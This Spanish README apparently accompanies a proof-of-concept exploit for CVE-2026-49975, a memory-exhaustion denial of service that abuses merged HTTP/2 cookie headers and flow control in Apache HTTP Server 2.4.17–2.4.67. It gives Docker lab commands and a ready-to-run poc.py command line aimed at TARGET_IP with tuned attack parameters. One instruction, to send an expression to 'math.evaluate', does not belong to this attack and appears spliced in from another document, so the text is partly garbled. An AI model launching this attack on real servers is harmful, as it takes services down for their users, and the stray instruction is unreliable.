
Prueba de concepto del exploit HTTP/2 Bomb para CVE-2026-49975, un DoS por agotamiento de memoria en el encabezado cookie en Apache HTTP Server 2.4.17-2.4.67, con laboratorio Docker y script PoC.
★ CVE-2026-49975 HTTP/2 Bomb PoC ★
https://github.com/user-attachments/assets/89310771-f704-45d1-a6c3-d910de1dbc74
CVE-2026-49975 es una vulnerabilidad de Denegación de Servicio (DoS) en Apache HTTP Server. La vulnerabilidad ocurre en la ruta de manejo de solicitudes HTTP/2, donde múltiples campos de encabezado
cookiepueden fusionarse sin ser contados correctamente contraLimitRequestFields. Al enviar una pequeña solicitud HTTP/2 codificada en HPACK que se expande en muchos campos de encabezadocookie, un atacante puede forzar al servidor a asignar memoria repetidamente durante la fusión de encabezados Cookie. El atacante puede entonces usar el control de flujo HTTP/2 para retrasar la transmisión de la respuesta, manteniendo los flujos afectados abiertos y evitando que la memoria asignada sea liberada.
| Categoría | Versión |
|---|
| Vulnerable | Apache HTTP Server 2.4.17 ≤ versión ≤ 2.4.67 |
| Parcheada | Apache HTTP Server 2.4.68 o posterior |
Construya y ejecute el entorno vulnerable de Apache HTTP Server.
docker build -t cve-2026-49975 .
docker run -d --name cve-2026-49975 --memory 8g -p 10081:80 cve-2026-49975
Después de iniciar el entorno vulnerable, siga los pasos a continuación para reproducir el ataque.
docker stats cve-2026-49975
Salida de ejemplo:
CONTAINER ID NAME CPU % MEM USAGE / LIMIT MEM %
xxxxxxxxxxxx cve-2026-49975 0.5% 35.2MiB / 8.0GiB 1.7%
Envíe la siguiente expresión a math.evaluate (por ejemplo, a través de la entrada de cálculo de la aplicación).
python3 poc.py \
--host TARGET_IP \
--port 10081 \
--connections 10 \
--streams 100 \
--refs 4091 \
--initial-window 0 \
--hold 300 \
--drip-interval 2 \
--drip-bytes 1
Verifique que el uso de memoria del contenedor Apache aumente y permanezca alto mientras los flujos del ataque se mantienen abiertos.